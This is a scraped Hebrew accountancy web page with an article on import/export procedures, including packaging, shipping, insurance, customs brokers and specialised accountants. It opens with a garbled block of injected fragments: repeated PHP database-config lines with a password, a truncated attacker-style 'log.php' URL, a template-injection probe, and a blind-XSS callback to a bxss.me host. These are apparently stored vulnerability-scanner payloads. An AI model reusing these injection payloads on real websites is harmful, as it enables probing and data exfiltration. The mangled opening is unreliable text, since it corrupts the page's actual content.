$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1iHl8CheO"; ?> $db_host = "1"; $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1<tMjBvl<"; ?>acker-9573/log.php?"; ?>{acx}}%>"; ?>"; ?>ass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>'hitylezkgfiwoe392a.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>  רואה חשבון ועוד - פעילות יבוא/ יצוא


רואה חשבון ועוד!

הבית הפיננסי שלך

 רואה חשבון ועוד
חוות דעת מקצועית בענייני ראיית חשבון:
שם מלא
מספר טלפון
פנייה לרואה חשבון >>

יבוא - יצוא


דרגו אותנו:
| דירוגך () בוצע בהצלחה
 () דירוגים | דירוג ממוצע ()
stars - based on reviews

Hebrew


ככל שהטכנולוגיה מאפשרת להפוך את העולם הגדול לכפר גלובאלי קטן, כך מתחזק הסחר הבינלאומי.

כיום, עם אמצעי תחבורה ותקשורת המאפשרים ליצור קשר גם עם הרחוקות שבמדינות, מתחזק המניע הכלכלי לעסקאות סחר חובקות עולם.

כתוצאה מכך, ייבוא וייצוא הופכים לרווחיים יותר – אך בו בזמן גם מורכבים מאוד. ניתן לחלק את תהליך הייצוא והייבוא למספר שלבים, אשר כל אחד מהם דורש התמחות וידע מקצועי.

אריזה:

השלב הראשון הוא אריזת המוצר בו סוחרים. במהלך השילוח המוצר עתיד להיטלטל פעמים רבות, כך שלמרות שהאריזה נראית דבר טריוויאלי יש לתת עליה את הדעת.

בהתאם לסוג המוצר והעסק, יש לבחור בין אריזה עצמאית לבין אריזה מקצועית. רבות מהחברות הפרטיות המספקות שירותי ייבוא-ייצוא מעניקות גם שירותי אריזה, במטרה להבטיח שהמוצר יגיע ליעדו ללא פגם.

במקרה של עסקת ייבוא, כלומר כאשר בעל העסק מקבל את המוצר מחו"ל, מומלץ לוודא שהמוצר נארז באופן מקצועי על מנת לצמצם את הסיכונים האפשריים.

כמו כן, האריזה צריכה להיות מותאמת לדרישות התקן של הרשויות הממשלתיות במדינה המייצאת ובמדינה המייבאת. דרישות שכאלו יכולות להתייחס למשקל האריזה, תקנות להגנה על איכות הסביבה ועוד, והן שונות בכל מדינה ומדינה.

משלוח:

אחת ההחלטות החשובות בתהליך הייבוא והייצוא היא בחירת שיטת המשלוח. דווקא משום שישנן שיטות רבות ושונות מאוד זו מזו, חשוב לבחור את המתאימה ביותר בהתאם לצרכים העסקיים הספציפיים לעסקה.

ראשית, יש לבחור בין משלוח ימי לבין משלוח אווירי (משלוח קרקעי בסחר חוץ עם ישראל רלוונטי רק לסחר עם המדינות הגובלות בישראל).

ההבדלים הבולטים בין משלוח ימי לאווירי מתמקדים בשתי סוגיות: המחיר ומהירות המשלוח. מבחינת המחיר, משלוח ימי לרוב יעביר תכולה גדולה יותר תמורת סכומי כסף נמוכים יותר מאשר שילוח אווירי; משלוח אווירי, לעומת זאת, יספק לרוב את השירות בטווחי זמן קצרים יותר מאשר משלוח ימי.

כל שיטת משלוח דורשת מסמכים שונים, אשר מטרתם לספק את מירב האינפורמציה והביטחון לכל הצדדים המעורבים בעסקה. סוג אחד של מסמכים שכאלו הוא שטרות המטען, המספקים הוכחה לכך שהמטען הועבר מהספק אל חברת השילוח על פי תנאי החוזה.

פן נוסף לתהליך המשלוח הוא היכולת לעקוב אחר תנועת המוצר בתהליך הייצוא או הייבוא. ישנן חברות המעניקות שירותי מעקב אחר מטענים, מעקב המאפשר לבדוק את מיקומו של המטען לאורך כל שלבי הטיפול בו.

כמו כן, במסגרת קביעת תנאי המשלוח, יש להגיע להסכמה בין המייבא והמייצא גם אודות ביטוח הסחורה. סוג הביטוח נקבע בהתאם לרצונות הסוחרים, אופי המשלוח והאריזה.

ישנם סוגים שונים של ביטוחים, המגדירים אחראים שונים לכל שלב ושלב של שינוע הסחורה; בכך נמנעת אי-בהירות לגבי האחריות על המוצר בכל שלב בתהליך הייצוא והייבוא.

מכסים ועמילות מכס

מכסים הם מיסים המוטלים על ידי המדינה על פעולות ייבוא וייצוא. המכסים משרתים מטרה כפולה: הם מכניסים כסף נוסף ממיסים לקופת המדינה, ומגנים על התוצרת המקומית מפני תוצרת זרה. נהלי המכס משתנים בין מדינה למדינה, בין סוגי סחורות שונים, בין היקפים שונים של ייצוא או ייבוא וכו'.

כל סחורה שנכנסת למדינה עוברת דרך רשויות המס, ותשלום המכס הוא שלב הכרחי בתהליך הוצאת הסחורה מהנמל אליו הגיעה אל רשות המייבא. משום שמערכת המכס מורכבת מאוד, ישנן חברות פרטיות רבות המציעות שירותי עמילות מכס.

עמיל מכס (המכונה לעיתים גם סוכן מכס) הוא איש מקצוע אשר התמחה במיסי מכס וקיבל רישיון עבודה במקצוע מטעם רשות המיסים.

לקריאה נוספת: שע''מ - יחידת המחשוב של רשות המיסים

עמיל המכס מגדיר מול רשויות המס את כל הפרטים הרלוונטיים למשלוח בהתאם לנהלים ולתקנים במדינה, במטרה להבטיח כי המשלוח יעבור באופן חוקי אך גם תוך תשלום מיסי מכס נמוכים ככל האפשר.

עיקר עבודתו של עמיל המכס היא לייצג את בעל העסק מול רשויות המס, אך רבות מהחברות העוסקות בתחום שולחות ידן גם לענייני משלוח וביטוח, כך שניתן לחפש עמיל מכס אשר יוכל לסייע גם בשלבים נוספים של תהליך הייצוא או הייבוא.

רואה חשבון ליבואנים וליצואנים

כמו כל חברה עסקית, גם חברות העוסקות בייצוא ובייבוא נדרשות לשירותיו של רואה חשבון. על רואה החשבון של העסק לעזור לחברה לפקח על ההתקשרויות העסקיות עם חברות בחו"ל, ולהבטיח כי כל הפעולות העסקיות מתנהלות כחוק ולטובת בעל העסק ובצורה מדוייקת.

קיראו בהרחבה על: היטלי סחר בישראל

ראיית החשבון בסחר בינלאומי דורשת התמחות מיוחדת, משום שעל רואה החשבון להכיר לא רק את התקנים של מדינתו, אלא חוקי ותקני חשבונאות בינלאומיים.

כפי שצוין קודם, רואה חשבון יכול להבטיח רישום מדוייק בספרי החשבונות של יבואנים או יצואנים ובכך למנוע תחמור שגורי או תשלום מס לא מדוייק.

בשל המורכבות של ראיית חשבון בסחר בינלאומי, יש לוודא כי רואה החשבון של העסק עסק בתחום בעבר ורכש את הידע הנדרש (ישנם מוסדות להכשרת רואי חשבון המעבירים השתלמויות ממוקדות בנושא). אם ניתן, רצוי אף לבחור ברואה חשבון אשר עסק בעבר במתן שירותי ראיית חשבון או הנהלת חשבונות ליצואנים או יבואנים.

קיראו בהרחבה על: בחירת משרד רואה חשבון

ייצוא וייבוא הן פעולות עסקיות נפוצות, אך טעות תהיה להסיק מכך שמדובר בתהליך פשוט. על מנת להבטיח רווח מקסימאלי מייבוא ומייצוא יש צורך להכיר לעומק את נהלי האריזה, המשלוח הביטוח והמכס, ולהיעזר בכל הגורמים המקצועיים בתחומים אלו.

למידע נוסף: מיסוי בין לאומי


תאריך: 28/09/2014 16:45
 
close